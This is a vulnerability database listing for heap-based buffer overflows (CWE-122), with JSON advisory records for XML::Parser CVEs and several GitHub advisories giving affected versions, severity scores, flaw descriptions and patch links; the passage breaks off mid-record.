CWE-122
AllowedHeap-based Buffer Overflow
Abstraction: Variant · Status: Draft
A heap overflow condition is a buffer overflow, where the buffer that can be overwritten is allocated in the heap portion of memory, generally meaning that the buffer was allocated using a routine such as malloc().
4111 vulnerabilities reference this CWE, most recent first.
CVE-2006-10003 (GCVE-0-2006-10003)
Vulnerability from cvelistv5 – Published: 2026-03-19 11:08 – Updated: 2026-07-15 01:28| Vendor | Product | Version | |
|---|---|---|---|
| TODDR | XML::Parser |
Affected:
0 , ≤ 2.47
(custom)
|
|
| Red Hat | Red Hat Enterprise Linux 10 |
Unaffected:
0:2.47-6.1.el10_1 , < *
(rpm)
cpe:/o:redhat:enterprise_linux:10.1 |
|
| Red Hat | Red Hat Enterprise Linux 10.0 Extended Update Support |
Unaffected:
0:2.47-6.el10_0.1 , < *
(rpm)
cpe:/o:redhat:enterprise_linux_eus:10.0 |
|
| Red Hat | Red Hat Enterprise Linux 7 Extended Lifecycle Support |
Unaffected:
0:2.41-10.el7_9.1 , < *
(rpm)
cpe:/o:redhat:rhel_els:7 |
|
| Red Hat | Red Hat Enterprise Linux 8 |
Unaffected:
0:2.44-12.el8_10 , < *
(rpm)
cpe:/a:redhat:enterprise_linux:8 |
|
| Red Hat | Red Hat Enterprise Linux 8.2 Advanced Update Support |
Unaffected:
0:2.44-11.el8_2.1 , < *
(rpm)
cpe:/a:redhat:rhel_aus:8.2 |
|
| Red Hat | Red Hat Enterprise Linux 8.4 Advanced Mission Critical Update Support |
Unaffected:
0:2.44-11.el8_4.1 , < *
(rpm)
cpe:/a:redhat:rhel_aus:8.4 |
|
| Red Hat | Red Hat Enterprise Linux 8.4 Extended Update Support Long-Life Add-On |
Unaffected:
0:2.44-11.el8_4.1 , < *
(rpm)
cpe:/a:redhat:rhel_eus_long_life:8.4 |
|
| Red Hat | Red Hat Enterprise Linux 8.6 Advanced Mission Critical Update Support |
Unaffected:
0:2.44-11.el8_6.1 , < *
(rpm)
cpe:/a:redhat:rhel_aus:8.6 |
|
| Red Hat | Red Hat Enterprise Linux 8.6 Telecommunications Update Service |
Unaffected:
0:2.44-11.el8_6.1 , < *
(rpm)
cpe:/a:redhat:rhel_tus:8.6 |
|
| Red Hat | Red Hat Enterprise Linux 8.6 Update Services for SAP Solutions |
Unaffected:
0:2.44-11.el8_6.1 , < *
(rpm)
cpe:/a:redhat:rhel_e4s:8.6 |
|
| Red Hat | Red Hat Enterprise Linux 8.8 Telecommunications Update Service |
Unaffected:
0:2.44-11.el8_8.1 , < *
(rpm)
cpe:/a:redhat:rhel_tus:8.8 |
|
| Red Hat | Red Hat Enterprise Linux 8.8 Update Services for SAP Solutions |
Unaffected:
0:2.44-11.el8_8.1 , < *
(rpm)
cpe:/a:redhat:rhel_e4s:8.8 |
|
| Red Hat | Red Hat Enterprise Linux 9 |
Unaffected:
0:2.46-9.1.el9_7 , < *
(rpm)
cpe:/a:redhat:enterprise_linux:9 |
|
| Red Hat | Red Hat Enterprise Linux 9.0 Update Services for SAP Solutions |
Unaffected:
0:2.46-9.el9_0.1 , < *
(rpm)
cpe:/a:redhat:rhel_e4s:9.0 |
|
| Red Hat | Red Hat Enterprise Linux 9.2 Update Services for SAP Solutions |
Unaffected:
0:2.46-9.el9_2.1 , < *
(rpm)
cpe:/a:redhat:rhel_e4s:9.2 |
|
| Red Hat | Red Hat Enterprise Linux 9.4 Extended Update Support |
Unaffected:
0:2.46-9.el9_4.1 , < *
(rpm)
cpe:/a:redhat:rhel_eus:9.4 |
|
| Red Hat | Red Hat Enterprise Linux 9.6 Extended Update Support |
Unaffected:
0:2.46-9.el9_6.1 , < *
(rpm)
cpe:/a:redhat:rhel_eus:9.6 |
|
| Red Hat | Red Hat Enterprise Linux 6 |
cpe:/o:redhat:enterprise_linux:6 |
{
"containers": {
"adp": [
{
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
}
},
{
"other": {
"content": {
"id": "CVE-2006-10003",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "yes"
},
{
"Technical Impact": "total"
}
],
"role": "CISA Coordinator",
"timestamp": "2026-03-19T17:08:41.621885Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2026-03-19T17:09:59.672Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2026-04-04T08:11:42.558Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"url": "http://www.openwall.com/lists/oss-security/2026/03/19/2"
},
{
"url": "https://lists.debian.org/debian-lts-announce/2026/04/msg00002.html"
}
],
"title": "CVE Program Container"
},
{
"affected": [
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/o:redhat:enterprise_linux:10.1"
],
"defaultStatus": "affected",
"packageName": "perl-XML-Parser",
"product": "Red Hat Enterprise Linux 10",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "0:2.47-6.1.el10_1",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/o:redhat:enterprise_linux_eus:10.0"
],
"defaultStatus": "affected",
"packageName": "perl-XML-Parser",
"product": "Red Hat Enterprise Linux 10.0 Extended Update Support",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "0:2.47-6.el10_0.1",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/o:redhat:rhel_els:7"
],
"defaultStatus": "affected",
"packageName": "perl-XML-Parser",
"product": "Red Hat Enterprise Linux 7 Extended Lifecycle Support",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "0:2.41-10.el7_9.1",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/a:redhat:enterprise_linux:8"
],
"defaultStatus": "affected",
"packageName": "perl-XML-Parser",
"product": "Red Hat Enterprise Linux 8",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "0:2.44-12.el8_10",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/a:redhat:rhel_aus:8.2"
],
"defaultStatus": "affected",
"packageName": "perl-XML-Parser",
"product": "Red Hat Enterprise Linux 8.2 Advanced Update Support",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "0:2.44-11.el8_2.1",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/a:redhat:rhel_aus:8.4"
],
"defaultStatus": "affected",
"packageName": "perl-XML-Parser",
"product": "Red Hat Enterprise Linux 8.4 Advanced Mission Critical Update Support",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "0:2.44-11.el8_4.1",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/a:redhat:rhel_eus_long_life:8.4"
],
"defaultStatus": "affected",
"packageName": "perl-XML-Parser",
"product": "Red Hat Enterprise Linux 8.4 Extended Update Support Long-Life Add-On",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "0:2.44-11.el8_4.1",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/a:redhat:rhel_aus:8.6"
],
"defaultStatus": "affected",
"packageName": "perl-XML-Parser",
"product": "Red Hat Enterprise Linux 8.6 Advanced Mission Critical Update Support",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "0:2.44-11.el8_6.1",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/a:redhat:rhel_tus:8.6"
],
"defaultStatus": "affected",
"packageName": "perl-XML-Parser",
"product": "Red Hat Enterprise Linux 8.6 Telecommunications Update Service",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "0:2.44-11.el8_6.1",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/a:redhat:rhel_e4s:8.6"
],
"defaultStatus": "affected",
"packageName": "perl-XML-Parser",
"product": "Red Hat Enterprise Linux 8.6 Update Services for SAP Solutions",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "0:2.44-11.el8_6.1",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/a:redhat:rhel_tus:8.8"
],
"defaultStatus": "affected",
"packageName": "perl-XML-Parser",
"product": "Red Hat Enterprise Linux 8.8 Telecommunications Update Service",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "0:2.44-11.el8_8.1",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/a:redhat:rhel_e4s:8.8"
],
"defaultStatus": "affected",
"packageName": "perl-XML-Parser",
"product": "Red Hat Enterprise Linux 8.8 Update Services for SAP Solutions",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "0:2.44-11.el8_8.1",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/a:redhat:enterprise_linux:9"
],
"defaultStatus": "affected",
"packageName": "perl-XML-Parser",
"product": "Red Hat Enterprise Linux 9",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "0:2.46-9.1.el9_7",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/a:redhat:rhel_e4s:9.0"
],
"defaultStatus": "affected",
"packageName": "perl-XML-Parser",
"product": "Red Hat Enterprise Linux 9.0 Update Services for SAP Solutions",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "0:2.46-9.el9_0.1",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/a:redhat:rhel_e4s:9.2"
],
"defaultStatus": "affected",
"packageName": "perl-XML-Parser",
"product": "Red Hat Enterprise Linux 9.2 Update Services for SAP Solutions",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "0:2.46-9.el9_2.1",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/a:redhat:rhel_eus:9.4"
],
"defaultStatus": "affected",
"packageName": "perl-XML-Parser",
"product": "Red Hat Enterprise Linux 9.4 Extended Update Support",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "0:2.46-9.el9_4.1",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/a:redhat:rhel_eus:9.6"
],
"defaultStatus": "affected",
"packageName": "perl-XML-Parser",
"product": "Red Hat Enterprise Linux 9.6 Extended Update Support",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "0:2.46-9.el9_6.1",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/o:redhat:enterprise_linux:6"
],
"defaultStatus": "affected",
"packageName": "perl-XML-Parser",
"product": "Red Hat Enterprise Linux 6",
"vendor": "Red Hat"
}
],
"datePublic": "2026-03-19T11:08:04.341Z",
"descriptions": [
{
"lang": "en",
"value": "A flaw was found in XML::Parser, a Perl module for parsing XML. This vulnerability, an off-by-one heap buffer overflow, occurs when processing an XML file with very deep element nesting. A remote attacker could exploit this by providing a specially crafted XML file, potentially leading to memory corruption."
}
],
"metrics": [
{
"other": {
"content": {
"namespace": "https://access.redhat.com/security/updates/classification/",
"value": "Important"
},
"type": "Red Hat severity rating"
}
},
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"format": "CVSS"
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-193",
"description": "Off-by-one Error",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2026-07-15T01:28:08.168Z",
"orgId": "0b0ca135-0b70-47e7-9f44-1890c2a1c46c",
"shortName": "redhat-SADP"
},
"references": [
{
"tags": [
"vdb-entry",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/security/cve/CVE-2006-10003"
},
{
"name": "RHBZ#2448999",
"tags": [
"issue-tracking",
"x_refsource_REDHAT"
],
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2448999"
},
{
"tags": [
"x_sadp-csaf-vex"
],
"url": "https://security.access.redhat.com/data/csaf/v2/vex/2006/cve-2006-10003.json"
},
{
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/errata/RHSA-2026:8578"
},
{
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/errata/RHSA-2026:9110"
},
{
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/errata/RHSA-2026:7680"
},
{
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/errata/RHSA-2026:7681"
},
{
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/errata/RHSA-2026:8609"
},
{
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/errata/RHSA-2026:8608"
},
{
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/errata/RHSA-2026:8610"
},
{
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/errata/RHSA-2026:8577"
},
{
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/errata/RHSA-2026:9246"
},
{
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/errata/RHSA-2026:9258"
},
{
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/errata/RHSA-2026:9259"
},
{
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/errata/RHSA-2026:9605"
},
{
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/errata/RHSA-2026:7679"
}
],
"solutions": [
{
"lang": "en",
"value": "RHSA-2026:8578: Red Hat Enterprise Linux Server (v. 7 ELS)"
},
{
"lang": "en",
"value": "RHSA-2026:9110: Red Hat Enterprise Linux AppStream EUS (v. 10.0)"
},
{
"lang": "en",
"value": "RHSA-2026:7680: Red Hat Enterprise Linux AppStream (v. 10)"
},
{
"lang": "en",
"value": "RHSA-2026:7681: Red Hat Enterprise Linux AppStream (v. 8)"
},
{
"lang": "en",
"value": "RHSA-2026:8609: Red Hat Enterprise Linux AppStream AUS (v. 8.2)"
},
{
"lang": "en",
"value": "RHSA-2026:8608: Red Hat Enterprise Linux AppStream AUS (v.8.4), Red Hat Enterprise Linux AppStream EUS EXTENSION (v.8.4)"
},
{
"lang": "en",
"value": "RHSA-2026:8610: Red Hat Enterprise Linux AppStream AUS (v.8.6), Red Hat Enterprise Linux AppStream E4S (v.8.6), Red Hat Enterprise Linux AppStream TUS (v.8.6)"
},
{
"lang": "en",
"value": "RHSA-2026:8577: Red Hat Enterprise Linux AppStream E4S (v.8.8), Red Hat Enterprise Linux AppStream TUS (v.8.8)"
},
{
"lang": "en",
"value": "RHSA-2026:9246: Red Hat Enterprise Linux AppStream E4S (v.9.0)"
},
{
"lang": "en",
"value": "RHSA-2026:9258: Red Hat Enterprise Linux AppStream E4S (v.9.2)"
},
{
"lang": "en",
"value": "RHSA-2026:9259: Red Hat Enterprise Linux AppStream EUS (v.9.4)"
},
{
"lang": "en",
"value": "RHSA-2026:9605: Red Hat Enterprise Linux AppStream EUS (v.9.6)"
},
{
"lang": "en",
"value": "RHSA-2026:7679: Red Hat Enterprise Linux AppStream (v. 9)"
}
],
"timeline": [
{
"lang": "en",
"time": "2026-03-19T12:01:39.997Z",
"value": "Reported to Red Hat."
},
{
"lang": "en",
"time": "2026-03-19T11:08:04.341Z",
"value": "Made public."
}
],
"title": "perl-xml-parser: XML::Parser: Memory corruption via deeply nested XML files",
"workarounds": [
{
"lang": "en",
"value": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability."
}
],
"x_adpType": "supplier",
"x_generator": {
"engine": "sadp-cli 1.0.0"
}
}
],
"cna": {
"affected": [
{
"collectionURL": "https://cpan.org/modules",
"defaultStatus": "unaffected",
"packageName": "XML-Parser",
"product": "XML::Parser",
"programFiles": [
"Expat.xs"
],
"programRoutines": [
{
"name": "startElement"
}
],
"repo": "http://github.com/toddr/XML-Parser",
"vendor": "TODDR",
"versions": [
{
"lessThanOrEqual": "2.47",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "XML::Parser versions through 2.47 for Perl has an off-by-one heap buffer overflow in st_serial_stack.\n\nIn the case (stackptr == stacksize - 1), the stack will NOT be expanded. Then the new value will be written at location (++stackptr), which equals stacksize and therefore falls just outside the allocated buffer.\n\nThe bug can be observed when parsing an XML file with very deep element nesting"
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-193",
"description": "CWE-193 Off-by-one Error",
"lang": "en",
"type": "CWE"
}
]
},
{
"descriptions": [
{
"cweId": "CWE-122",
"description": "CWE-122 Heap-based Buffer Overflow",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2026-03-19T11:08:04.341Z",
"orgId": "9b29abf9-4ab0-4765-b253-1875cd9b441e",
"shortName": "CPANSec"
},
"references": [
{
"tags": [
"issue-tracking"
],
"url": "https://rt.cpan.org/Ticket/Display.html?id=19860"
},
{
"tags": [
"issue-tracking"
],
"url": "https://github.com/cpan-authors/XML-Parser/issues/39"
},
{
"tags": [
"patch"
],
"url": "https://github.com/cpan-authors/XML-Parser/commit/3eb9cc95420fa0c3f76947c4708962546bf27cfd.patch"
}
],
"solutions": [
{
"lang": "en",
"value": "Apply the patch that has been publicly available since 2006-06-13 or upgrade to version 2.48 or later when it is released."
}
],
"source": {
"discovery": "UNKNOWN"
},
"timeline": [
{
"lang": "en",
"time": "2006-06-13T00:00:00.000Z",
"value": "Issue logged and patch provided in Request Tracker for XML::Parser"
},
{
"lang": "en",
"time": "2019-09-23T00:00:00.000Z",
"value": "Issue migrated to github issue tracker"
},
{
"lang": "en",
"time": "2019-09-24T00:00:00.000Z",
"value": "Patch provided in github issue tracker"
},
{
"lang": "en",
"time": "2026-03-16T00:00:00.000Z",
"value": "PR created and commit merged to git repo"
}
],
"title": "XML::Parser versions through 2.47 for Perl has an off-by-one heap buffer overflow in st_serial_stack",
"workarounds": [
{
"lang": "en",
"value": "Apply the patch that has been publicly available since 2006-06-13."
}
],
"x_generator": {
"engine": "cpansec-cna-tool 0.1"
}
}
},
"cveMetadata": {
"assignerOrgId": "9b29abf9-4ab0-4765-b253-1875cd9b441e",
"assignerShortName": "CPANSec",
"cveId": "CVE-2006-10003",
"datePublished": "2026-03-19T11:08:04.341Z",
"dateReserved": "2026-03-16T22:52:39.890Z",
"dateUpdated": "2026-07-15T01:28:08.168Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2006-10002 (GCVE-0-2006-10002)
Vulnerability from cvelistv5 – Published: 2026-03-19 11:03 – Updated: 2026-04-29 14:36| Vendor | Product | Version | |
|---|---|---|---|
| TODDR | XML::Parser |
Affected:
0 , ≤ 2.45
(custom)
|
{
"containers": {
"adp": [
{
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
}
},
{
"other": {
"content": {
"id": "CVE-2006-10002",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "yes"
},
{
"Technical Impact": "total"
}
],
"role": "CISA Coordinator",
"timestamp": "2026-03-19T17:11:03.634936Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2026-04-29T14:36:41.837Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2026-03-22T23:06:42.361Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"url": "http://www.openwall.com/lists/oss-security/2026/03/19/1"
},
{
"url": "http://www.openwall.com/lists/oss-security/2026/03/22/3"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"collectionURL": "https://cpan.org/modules",
"defaultStatus": "unaffected",
"packageName": "XML-Parser",
"product": "XML::Parser",
"programFiles": [
"Expat.xs"
],
"programRoutines": [
{
"name": "parse_stream"
}
],
"repo": "http://github.com/toddr/XML-Parser",
"vendor": "TODDR",
"versions": [
{
"lessThanOrEqual": "2.45",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "XML::Parser versions through 2.45 for Perl could overflow the pre-allocated buffer size cause a heap corruption (double free or corruption) and crashes.\n\nA :utf8 PerlIO layer, parse_stream() in Expat.xs could overflow the XML input buffer because Perl\u0027s read() returns decoded characters while SvPV() gives back multi-byte UTF-8 bytes that can exceed the pre-allocated buffer size. This can cause heap corruption (double free or corruption) and crashes."
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-122",
"description": "CWE-122 Heap-based Buffer Overflow",
"lang": "en",
"type": "CWE"
}
]
},
{
"descriptions": [
{
"cweId": "CWE-176",
"description": "CWE-176 Improper Handling of Unicode Encoding",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2026-03-21T11:43:43.607Z",
"orgId": "9b29abf9-4ab0-4765-b253-1875cd9b441e",
"shortName": "CPANSec"
},
"references": [
{
"tags": [
"issue-tracking"
],
"url": "https://rt.cpan.org/Ticket/Display.html?id=19859"
},
{
"tags": [
"issue-tracking"
],
"url": "https://github.com/cpan-authors/XML-Parser/issues/64"
},
{
"tags": [
"release-notes"
],
"url": "https://metacpan.org/release/TODDR/XML-Parser-2.46/changes"
},
{
"tags": [
"patch"
],
"url": "https://github.com/cpan-authors/XML-Parser/commit/56b0509dfc6b559cd7555ea81ee62e3622069255.patch"
}
],
"solutions": [
{
"lang": "en",
"value": "Apply the patch that has been publicly available since 2006-06-13 or upgrade to version 2.46 or later."
}
],
"source": {
"discovery": "UNKNOWN"
},
"timeline": [
{
"lang": "en",
"time": "2006-06-13T00:00:00.000Z",
"value": "Issue logged in Request Tracker for XML::Parser"
},
{
"lang": "en",
"time": "2006-08-11T00:00:00.000Z",
"value": "Patch provided in Request Tracker for XML::Parser"
},
{
"lang": "en",
"time": "2019-09-24T00:00:00.000Z",
"value": "Issue migrated to github issue tracker"
},
{
"lang": "en",
"time": "2019-09-24T00:00:00.000Z",
"value": "Patch provided in github issue tracker"
},
{
"lang": "en",
"time": "2019-09-24T00:00:00.000Z",
"value": "Included in release 2.46 released to CPAN"
}
],
"title": "XML::Parser versions through 2.45 for Perl could overflow the pre-allocated buffer size cause a heap corruption (double free or corruption) and crashes",
"workarounds": [
{
"lang": "en",
"value": "Apply the patch that has been publicly available since 2006-06-13."
}
],
"x_generator": {
"engine": "cpansec-cna-tool 0.1"
}
}
},
"cveMetadata": {
"assignerOrgId": "9b29abf9-4ab0-4765-b253-1875cd9b441e",
"assignerShortName": "CPANSec",
"cveId": "CVE-2006-10002",
"datePublished": "2026-03-19T11:03:46.888Z",
"dateReserved": "2026-03-16T22:47:45.685Z",
"dateUpdated": "2026-04-29T14:36:41.837Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
GHSA-2268-98WH-QFHF
Vulnerability from github – Published: 2023-12-29 15:30 – Updated: 2024-01-05 19:49An issue in the component GroovyEngine.execute of JLine v3.24.1 allows attackers to cause an out of memory (OOM) error exception.
{
"affected": [
{
"package": {
"ecosystem": "Maven",
"name": "org.jline:jline-parent"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "3.25.0"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2023-50572"
],
"database_specific": {
"cwe_ids": [
"CWE-122",
"CWE-787"
],
"github_reviewed": true,
"github_reviewed_at": "2023-12-29T20:08:20Z",
"nvd_published_at": "2023-12-29T15:15:10Z",
"severity": "MODERATE"
},
"details": "An issue in the component `GroovyEngine.execute` of JLine v3.24.1 allows attackers to cause an out of memory (OOM) error exception.",
"id": "GHSA-2268-98wh-qfhf",
"modified": "2024-01-05T19:49:51Z",
"published": "2023-12-29T15:30:37Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2023-50572"
},
{
"type": "WEB",
"url": "https://github.com/jline/jline3/issues/909"
},
{
"type": "WEB",
"url": "https://github.com/jline/jline3/commit/f3c60a3e6255e8e0c20d5043a4fe248446f292bb"
},
{
"type": "PACKAGE",
"url": "https://github.com/jline/jline3"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
"type": "CVSS_V3"
}
],
"summary": "JLine vulnerable to out of memory error"
}
GHSA-228J-W5V9-347H
Vulnerability from github – Published: 2024-03-05 12:30 – Updated: 2025-04-10 21:30A CWE-122 “Heap-based Buffer Overflow” vulnerability in the “logger_generic” function of the “Ax_rtu” binary allows a remote authenticated attacker to trigger a memory corruption in the context of the binary. This may result in a Denial-of-Service (DoS) condition, possibly in the execution of arbitrary code with the same privileges of the process (root), or have other unspecified impacts on the device. This issue affects: AiLux imx6 bundle below version imx6_1.0.7-2.
{
"affected": [],
"aliases": [
"CVE-2023-45591"
],
"database_specific": {
"cwe_ids": [
"CWE-122",
"CWE-787"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2024-03-05T12:15:45Z",
"severity": "HIGH"
},
"details": "A CWE-122 \u201cHeap-based Buffer Overflow\u201d vulnerability in the \u201clogger_generic\u201d function of the \u201cAx_rtu\u201d binary allows a remote authenticated attacker to trigger a memory corruption in the context of the binary. This may result in a Denial-of-Service (DoS) condition, possibly in the execution of arbitrary code with the same privileges of the process (root), or have other unspecified impacts on the device. This issue affects: AiLux imx6 bundle below version imx6_1.0.7-2.",
"id": "GHSA-228j-w5v9-347h",
"modified": "2025-04-10T21:30:45Z",
"published": "2024-03-05T12:30:31Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2023-45591"
},
{
"type": "WEB",
"url": "https://www.nozominetworks.com/labs/vulnerability-advisories-cve-2023-45591"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-22G4-7M96-G7PP
Vulnerability from github – Published: 2024-07-30 21:31 – Updated: 2024-08-23 03:30A heap buffer overflow in the function cp_unfilter() (/vendor/cute_png.h) of hicolor v0.5.0 allows attackers to cause a Denial of Service (DoS) via a crafted PNG file.
{
"affected": [],
"aliases": [
"CVE-2024-41437"
],
"database_specific": {
"cwe_ids": [
"CWE-122",
"CWE-787"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2024-07-30T19:15:10Z",
"severity": "MODERATE"
},
"details": "A heap buffer overflow in the function cp_unfilter() (/vendor/cute_png.h) of hicolor v0.5.0 allows attackers to cause a Denial of Service (DoS) via a crafted PNG file.",
"id": "GHSA-22g4-7m96-g7pp",
"modified": "2024-08-23T03:30:59Z",
"published": "2024-07-30T21:31:27Z",
"references": [
{
"type": "ADVISORY",
